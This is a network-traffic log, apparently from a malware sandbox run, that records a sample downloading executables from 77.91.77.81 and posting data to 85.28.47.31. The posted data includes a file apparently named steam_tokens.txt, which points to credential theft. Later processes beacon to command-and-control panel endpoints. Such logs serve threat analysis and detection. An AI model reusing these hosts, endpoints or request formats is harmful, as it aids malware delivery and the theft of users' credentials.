                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        1192.168.2.64971877.91.77.81801588C:\Users\user\Desktop\file.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:14:23.425755024 CEST77OUTGET /mine/amadka.exe HTTP/1.1
                                                                                        Host: 77.91.77.81
                                                                                        Cache-Control: no-cache
                                                                                        Jul 24, 2024 07:14:24.150840998 CEST1236INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:14:24 GMT
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Length: 1893888
                                                                                        Last-Modified: Wed, 24 Jul 2024 05:04:35 GMT
                                                                                        Connection: keep-alive
                                                                                        ETag: "66a08b63-1ce600"
                                                                                        Accept-Ranges: bytes
                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 84 ea 61 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e4 04 00 00 c6 01 00 00 00 00 00 00 00 4b 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 [TRUNCATED]
                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PJr>r>r>=r>;(r>]:r>]=r>];r>:r>?r>r?^r>7r>r><r>Richr>PELafK@0K@XlJJ @.rsrc@.idata @ p*@tvrujsnp 1@vpziaunmJ@.taggant0K"@
                                                                                        Jul 24, 2024 07:14:24.150873899 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                        Data Ascii:
                                                                                        Jul 24, 2024 07:14:24.150891066 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                        Data Ascii:
                                                                                        Jul 24, 2024 07:14:24.150907040 CEST1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                        Data Ascii:
                                                                                        Jul 24, 2024 07:14:24.150923967 CEST1236INData Raw: 6c 15 bc 6b 32 01 06 09 dc b1 d2 d5 4a 11 e1 8d d1 12 5d 1a 55 ca 23 11 c3 99 4f 65 70 15 7c 6b f2 75 2d 02 7f a1 91 6b da 26 4f 98 53 01 df 6a db d5 c5 6a fe 24 1f 78 53 61 15 c2 c7 95 6d 59 02 75 d1 74 8c 00 2d 59 12 79 66 a3 a5 f1 c1 4d 62 b9
                                                                                        Data Ascii: lk2J]U#Oep|ku-k&OSjj$xSamYut-YyfMbB1yF-)i6&k]bj;=d8[]j>u`J@.Yg,1<ku-~k"OXceb1XQy;FbbAU.B-J@u] g-jV|
                                                                                        Jul 24, 2024 07:14:24.150938988 CEST1236INData Raw: 56 d7 23 cd 62 46 55 ce 86 77 2f 19 5d 79 21 55 52 b5 e8 05 0b fe 77 4c 05 03 b0 81 9c 6f 61 41 3a 60 eb 73 ac 8d 18 55 aa 99 1a d9 ed f2 ee 15 57 ff 61 d4 2e 47 6e be 4e 76 03 1a 48 24 1c 09 a1 4e d0 78 0b 9b 25 18 5c 44 8d 10 04 07 d0 c4 44 6d
                                                                                        Data Ascii: V#bFUw/]y!URwLoaA:`sUWa.GnNvH$Nx%\DDmYy{HBHG1Ec;F{PPwUnPgKb#_*?1.kR,dVP!})tA7)%E|>$(-~e.xMC>]w|QN!
                                                                                        Jul 24, 2024 07:14:24.150955915 CEST1236INData Raw: 44 a9 69 6a 75 1e fd 2b 94 db 79 52 a6 7b a5 91 44 ed f5 95 da 39 e3 19 0a c5 95 b1 0e bb 1f 5d 87 00 5e fb 08 f7 93 2d bc f2 96 69 83 75 cd be 58 ea 38 18 57 12 5b 55 2a 3f 62 a3 a1 e1 d3 04 83 bb e8 93 36 9b eb 3a 44 86 b8 76 17 a5 09 68 93 bc
                                                                                        Data Ascii: Diju+yR{D9]^-iuX8W[U*?b6:DvhWNS#1.z>2Nd.iX.O3'ewY)Z3eIRQ_V^0RNG.J-6R83ZA"ZqU'asrHl1m
                                                                                        Jul 24, 2024 07:14:24.151144981 CEST1236INData Raw: 52 ba 5e bb 03 13 ee 3f b3 0d 53 8f 52 a5 13 1b ea 91 f0 82 e6 62 ed 60 51 8c 88 db 88 94 cc bd 83 b9 5b 55 6d f3 d4 cc 23 ed 8e 42 34 2e 11 5b cd 41 15 0a 54 b3 eb e7 cd 84 5e 91 3e 92 16 10 89 37 a6 27 f2 aa dc 7b f9 fd 94 50 f0 f7 f4 d1 79 cf
                                                                                        Data Ascii: R^?SRb`Q[Um#B4.[AT^>7'{Py*qd~]J^HRAC#guVGC=s|p<R9jz{L &q].ybB<`>@XXwu`\]"H&w343A=}
                                                                                        Jul 24, 2024 07:14:24.151160955 CEST1236INData Raw: df c7 1a 75 30 af b1 f9 c0 32 df f6 1a 81 e1 25 e9 e6 29 95 48 c9 4d 05 82 7e 62 fa 94 dc 10 b3 df 4b 0e 80 47 5d d9 48 9d c1 cd 13 cb 36 fc e5 b8 df 7e 6c 90 43 77 55 16 9f 23 25 48 e5 38 14 d1 57 81 47 9e 77 53 0c 59 68 2e 59 0c b6 57 d1 13 f9
                                                                                        Data Ascii: u02%)HM~bKG]H6~lCwU#%H8WGwSYh.YWuB*gv~2AXcHmps};r&lk5Wj\zd%[Y1ui>G0T%KqkTXoZ&fekaUDuIv,YW!8<[BUtMMQS H}
                                                                                        Jul 24, 2024 07:14:24.151176929 CEST1236INData Raw: a6 3e 81 01 43 02 52 e9 c5 ea 1d bb 79 41 ae 8f 83 af f5 c7 65 08 0f d1 81 7f 43 f9 ab a1 d2 23 fc 71 5f e1 5a 7c 62 1d dc fe 58 22 c6 8f 12 8d 8a 9f 6f cf 02 28 95 0e 44 53 fc d6 5c a4 68 e3 ea 61 ba 9b e3 8d 35 07 89 1b 98 5e 8e f7 04 5a fb 7d
                                                                                        Data Ascii: >CRyAeC#q_Z|bX"o(DS\ha5^Z}74 GWBZcfERnW~PY]uK+7r<{HUDyIV:&M\e6MNWyKyHAe[0vXQ$hR=i57+\bv(}rs8u
                                                                                        Jul 24, 2024 07:14:24.157444954 CEST1236INData Raw: 97 ec d0 8d da 75 6a 50 dd 31 c0 6f 02 7d 0d 05 66 c8 12 ab 67 0f 03 74 45 e1 a9 c4 08 df 04 bf 65 41 18 f8 97 6a f1 9b 13 e8 4d f7 4b 94 d8 3f 41 e0 56 42 c5 57 5e a3 a0 17 be 3f 11 7a 46 0c 51 00 20 12 1d 15 03 10 8f b3 49 f3 52 b8 c3 32 77 bd
                                                                                        Data Ascii: ujP1o}fgtEeAjMK?AVBW^?zFQ IR2wJ{iYq>ZFF`]qa}(Yaz&-iaE/>07@+a/.n/|CEKU7j,#!v%qG@f_.K%:Z/9 `=9S4Q_!
                                                                                        Jul 24, 2024 07:14:26.007170916 CEST73OUTGET /cost/go.exe HTTP/1.1
                                                                                        Host: 77.91.77.81
                                                                                        Cache-Control: no-cache
                                                                                        Jul 24, 2024 07:14:26.234891891 CEST1236INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:14:26 GMT
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Length: 91648
                                                                                        Last-Modified: Wed, 24 Jul 2024 05:03:59 GMT
                                                                                        Connection: keep-alive
                                                                                        ETag: "66a08b3f-16600"
                                                                                        Accept-Ranges: bytes
                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 62 05 40 5d 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 0c 01 00 00 56 00 00 00 00 00 00 00 10 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 01 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c 71 01 00 c8 00 00 00 00 90 01 00 9c 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELb@]2V0@|qpt,.code78 `.textP< `.rdata304@@.data,pD@.rsrcV@@
                                                                                        Jul 24, 2024 07:14:26.336961031 CEST77OUTGET /soka/random.exe HTTP/1.1
                                                                                        Host: 77.91.77.81
                                                                                        Cache-Control: no-cache
                                                                                        Jul 24, 2024 07:14:26.559228897 CEST1236INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:14:26 GMT
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Length: 1929728
                                                                                        Last-Modified: Tue, 23 Jul 2024 12:15:17 GMT
                                                                                        Connection: keep-alive
                                                                                        ETag: "669f9ed5-1d7200"
                                                                                        Accept-Ranges: bytes
                                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 2a cf 5e 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e4 04 00 00 c6 01 00 00 00 00 00 00 70 4c 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 [TRUNCATED]
                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PJr>r>r>=r>;(r>]:r>]=r>];r>:r>?r>r?^r>7r>r><r>Richr>PEL*^fpL@L>@XlWLLWL @.rsrc@.idata @ P+@qhedmxhi`2Z@aflvgrfd`LL@.taggant0pL"P@


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        2192.168.2.64972785.28.47.31801588C:\Users\user\Desktop\file.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:14:29.548319101 CEST561OUTPOST /5499d72b3a3e55be.php HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----AKKKECBKKECGCAAAEHJK
                                                                                        Host: 85.28.47.31
                                                                                        Content-Length: 363
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 45 43 42 4b 4b 45 43 47 43 41 41 41 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 30 34 39 61 61 62 63 64 37 61 38 30 63 39 36 35 62 61 38 38 34 38 62 34 32 63 33 34 36 32 39 64 64 33 66 62 30 63 65 61 64 34 62 36 36 30 34 64 39 32 61 30 32 34 61 36 30 61 34 33 30 36 65 38 38 33 33 66 61 62 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 45 43 42 4b 4b 45 43 47 43 41 41 41 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 4b 4b 45 43 42 4b 4b 45 43 47 43 41 41 41 45 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED]
                                                                                        Data Ascii: ------AKKKECBKKECGCAAAEHJKContent-Disposition: form-data; name="token"d5049aabcd7a80c965ba8848b42c34629dd3fb0cead4b6604d92a024a60a4306e8833fab------AKKKECBKKECGCAAAEHJKContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------AKKKECBKKECGCAAAEHJKContent-Disposition: form-data; name="file"------AKKKECBKKECGCAAAEHJK--
                                                                                        Jul 24, 2024 07:14:30.549968958 CEST203INHTTP/1.1 200 OK
                                                                                        Date: Wed, 24 Jul 2024 05:14:30 GMT
                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                        Content-Length: 0
                                                                                        Keep-Alive: timeout=5, max=100
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Jul 24, 2024 07:14:30.851347923 CEST463OUTPOST /5499d72b3a3e55be.php HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----DAKEHIJJKEGIDHIEHDAF
                                                                                        Host: 85.28.47.31
                                                                                        Content-Length: 265
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 45 48 49 4a 4a 4b 45 47 49 44 48 49 45 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 30 34 39 61 61 62 63 64 37 61 38 30 63 39 36 35 62 61 38 38 34 38 62 34 32 63 33 34 36 32 39 64 64 33 66 62 30 63 65 61 64 34 62 36 36 30 34 64 39 32 61 30 32 34 61 36 30 61 34 33 30 36 65 38 38 33 33 66 61 62 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 48 49 4a 4a 4b 45 47 49 44 48 49 45 48 44 41 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 45 48 49 4a 4a 4b 45 47 49 44 48 49 45 48 44 41 46 2d 2d 0d 0a
                                                                                        Data Ascii: ------DAKEHIJJKEGIDHIEHDAFContent-Disposition: form-data; name="token"d5049aabcd7a80c965ba8848b42c34629dd3fb0cead4b6604d92a024a60a4306e8833fab------DAKEHIJJKEGIDHIEHDAFContent-Disposition: form-data; name="message"files------DAKEHIJJKEGIDHIEHDAF--
                                                                                        Jul 24, 2024 07:14:31.038716078 CEST202INHTTP/1.1 200 OK
                                                                                        Date: Wed, 24 Jul 2024 05:14:30 GMT
                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                        Content-Length: 0
                                                                                        Keep-Alive: timeout=5, max=99
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Jul 24, 2024 07:14:31.795164108 CEST470OUTPOST /5499d72b3a3e55be.php HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----KJEBKJDAFHJDGDHJKKEG
                                                                                        Host: 85.28.47.31
                                                                                        Content-Length: 272
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 2d 2d 2d 2d 2d 2d 4b 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 35 30 34 39 61 61 62 63 64 37 61 38 30 63 39 36 35 62 61 38 38 34 38 62 34 32 63 33 34 36 32 39 64 64 33 66 62 30 63 65 61 64 34 62 36 36 30 34 64 39 32 61 30 32 34 61 36 30 61 34 33 30 36 65 38 38 33 33 66 61 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 45 42 4b 4a 44 41 46 48 4a 44 47 44 48 4a 4b 4b 45 47 2d 2d 0d 0a
                                                                                        Data Ascii: ------KJEBKJDAFHJDGDHJKKEGContent-Disposition: form-data; name="token"d5049aabcd7a80c965ba8848b42c34629dd3fb0cead4b6604d92a024a60a4306e8833fab------KJEBKJDAFHJDGDHJKKEGContent-Disposition: form-data; name="message"wkkjqaiaxkhb------KJEBKJDAFHJDGDHJKKEG--
                                                                                        Jul 24, 2024 07:14:32.486737967 CEST202INHTTP/1.1 200 OK
                                                                                        Date: Wed, 24 Jul 2024 05:14:31 GMT
                                                                                        Server: Apache/2.4.41 (Ubuntu)
                                                                                        Content-Length: 0
                                                                                        Keep-Alive: timeout=5, max=98
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        3192.168.2.64975734.107.221.82807200C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:14:40.321119070 CEST303OUTGET /canonical.html HTTP/1.1
                                                                                        Host: detectportal.firefox.com
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Cache-Control: no-cache
                                                                                        Pragma: no-cache
                                                                                        Connection: keep-alive
                                                                                        Jul 24, 2024 07:14:40.785394907 CEST298INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Content-Length: 90
                                                                                        Via: 1.1 google
                                                                                        Date: Tue, 23 Jul 2024 09:24:28 GMT
                                                                                        Age: 71412
                                                                                        Content-Type: text/html
                                                                                        Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                        Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                        Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>
                                                                                        Jul 24, 2024 07:14:50.829890013 CEST6OUTData Raw: 00
                                                                                        Data Ascii:
                                                                                        Jul 24, 2024 07:15:00.850018024 CEST6OUTData Raw: 00
                                                                                        Data Ascii:
                                                                                        Jul 24, 2024 07:15:09.591272116 CEST303OUTGET /canonical.html HTTP/1.1
                                                                                        Host: detectportal.firefox.com
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Cache-Control: no-cache
                                                                                        Pragma: no-cache
                                                                                        Connection: keep-alive
                                                                                        Jul 24, 2024 07:15:09.687144995 CEST298INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Content-Length: 90
                                                                                        Via: 1.1 google
                                                                                        Date: Tue, 23 Jul 2024 09:24:28 GMT
                                                                                        Age: 71441
                                                                                        Content-Type: text/html
                                                                                        Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                        Data Raw: 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 73 3a 2f 2f 73 75 70 70 6f 72 74 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 6b 62 2f 63 61 70 74 69 76 65 2d 70 6f 72 74 61 6c 22 2f 3e
                                                                                        Data Ascii: <meta http-equiv="refresh" content="0;url=https://support.mozilla.org/kb/captive-portal"/>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        4192.168.2.64975834.107.221.82807200C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:14:40.859090090 CEST305OUTGET /success.txt?ipv4 HTTP/1.1
                                                                                        Host: detectportal.firefox.com
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
                                                                                        Accept: */*
                                                                                        Accept-Language: en-US,en;q=0.5
                                                                                        Accept-Encoding: gzip, deflate
                                                                                        Connection: keep-alive
                                                                                        Pragma: no-cache
                                                                                        Cache-Control: no-cache
                                                                                        Jul 24, 2024 07:14:41.312366962 CEST216INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Content-Length: 8
                                                                                        Via: 1.1 google
                                                                                        Date: Tue, 23 Jul 2024 10:10:52 GMT
                                                                                        Age: 68629
                                                                                        Content-Type: text/plain
                                                                                        Cache-Control: public,must-revalidate,max-age=0,s-maxage=3600
                                                                                        Data Raw: 73 75 63 63 65 73 73 0a
                                                                                        Data Ascii: success
                                                                                        Jul 24, 2024 07:14:51.378334999 CEST6OUTData Raw: 00
                                                                                        Data Ascii:
                                                                                        Jul 24, 2024 07:15:01.399136066 CEST6OUTData Raw: 00
                                                                                        Data Ascii:


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        5192.168.2.64981977.91.77.8280504C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:05.798949003 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 4
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 73 74 3d 73
                                                                                        Data Ascii: st=s
                                                                                        Jul 24, 2024 07:15:06.675759077 CEST219INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:06 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Refresh: 0; url = Login.php
                                                                                        Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 1 0
                                                                                        Jul 24, 2024 07:15:06.678776979 CEST309OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Host: 77.91.77.82
                                                                                        Content-Length: 160
                                                                                        Cache-Control: no-cache
                                                                                        Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                                                                                        Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                                                                                        Jul 24, 2024 07:15:06.901160955 CEST361INHTTP/1.1 200 OK
                                                                                        Server: nginx/1.18.0 (Ubuntu)
                                                                                        Date: Wed, 24 Jul 2024 05:15:06 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: keep-alive
                                                                                        Data Raw: 61 62 0d 0a 20 3c 63 3e 31 30 30 30 30 31 39 30 33 31 2b 2b 2b 62 35 39 33 37 63 31 61 39 39 64 35 66 39 64 62 30 64 35 64 61 32 63 38 35 30 36 37 33 62 35 64 37 36 61 63 31 63 66 38 64 37 63 32 62 33 61 34 66 63 61 31 63 36 33 31 39 37 35 39 34 39 23 31 30 30 30 30 32 31 30 30 31 2b 2b 2b 66 63 38 66 37 63 31 65 64 33 63 30 66 39 63 33 30 64 34 34 62 35 63 30 34 66 37 65 33 62 34 34 36 30 61 35 30 32 62 34 63 62 63 35 61 32 65 61 66 65 62 37 38 34 36 64 39 33 34 66 34 38 62 31 35 65 61 61 34 39 35 63 34 39 23 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: ab <c>1000019031+++b5937c1a99d5f9db0d5da2c850673b5d76ac1cf8d7c2b3a4fca1c631975949#1000021001+++fc8f7c1ed3c0f9c30d44b5c04f7e3b4460a502b4cbc5a2eafeb7846d934f48b15eaa495c49#<d>0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        6192.168.2.64982077.91.77.81804900C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Jul 24, 2024 07:15:05.859972954 CEST152OUTPOST /Kiru9gu/index.php HTTP/1.1
